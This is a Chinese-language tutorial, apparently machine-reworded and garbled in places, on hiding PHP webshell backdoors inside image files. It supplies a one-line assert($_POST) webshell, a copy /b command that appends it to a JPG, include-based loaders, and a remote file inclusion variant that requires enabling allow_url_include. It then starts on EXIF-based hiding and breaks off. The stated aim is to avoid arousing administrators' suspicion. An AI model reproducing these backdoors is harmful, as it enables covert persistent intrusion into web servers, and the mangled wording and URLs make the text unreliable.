PHP照片侧门隐匿攻略大全

大家平常隐匿照片侧门是啥步骤呢？大家看来一下

0x01 低等的隐匿 *** ：

1、建立一个eval.php文件，上边加入团队的侧门：

1 assert($_POST[feiji]);?gt;

2、找一张图片1.jpg，更好是是以目地网址上免费下载出来的照片。

3、合并图片和php侧门：

1 Copy/bC:\xampp\htdocs\images\1.jpgC:\xampp\htdocs\images\eval.phpC:\xampp\htdocs\images\2.jpg

4、在一切一个php文件中囊括这一2.jpg的照片侧门，这儿以images.php为例子，载入下列的编码：

1 include(‘2.jpg’);?gt;

5、提交2.jpg和images.php，在水果刀里加上一句话侧门：http://.0.0.1/images/images.php，登陆密码为feiji。

会见照片一切正常：

会见images.php网页页面涌起错码，但是侧门早已一切正常运作：

但是一句话在水果刀里是能够分析乐成的：

注：省掉第三步也是能够的，只不过是立即会见照片会错码，会让管理人员起疑心。

0x02 初级隐匿的 *** ：

1、确实便是远程控制文档囊括，都不仅仅对于照片，规定给你高管理权限，可以实际操作Apache和改动php.ini文件：

• 改动ini的设定选择项allow_url_fopen和allow_url_include为ON。

2、创建一切一个php文件中，以images.php为例子，载入下列的编码：

1 $filename=$_GET['feiji'];include($filename);?gt;

3、适才做的照片侧门jpg能够放到其他网址(http://www.xxxx.com)上，在水果刀里加上一句话侧门：

http://.0.0.1/images/images.php?feiji=upian/122020/2y2npbxpvnk-yseo_com.jpg登陆密码为feiji

注：那样做的优势是能够随时随地转换诸多侧门，瑕玷是难以获得到高管理权限。

0x03 高級的隐匿 ***

背靠专业知识：

EXIF信息内容: 是可互换位图文件的简称，是专业为数码照相机的相片设置的，能够记录数码相片的特性信息内容和拍攝数据信息。全部的JPEG文档以字符串数组“0xFFD8”开始，并以字符串数组“0xFFD9”竣事。文件头中有一系列“0xFF??”花式的字符串数组，称之为“标志”，用于标记JPEG文档的信息内容段。“0xFFD8”平面图像信息内容最开始，“0xFFD9”平面图像信息内容竣事，这两个标志后边沒有信息内容，而其他标志紧随一些信息内容标识符。

确实就是这个玩意：选中照片鼠标右键挑选特性，在详细资料里衬能够见到（win7）

1、php里衬有一个涵数exif_read_data()，能够获得照片的EXIF信息内容头，但是必须打开php_exif控制模块。

2、我们都是能够随便改动EXIF信息内容的，比如：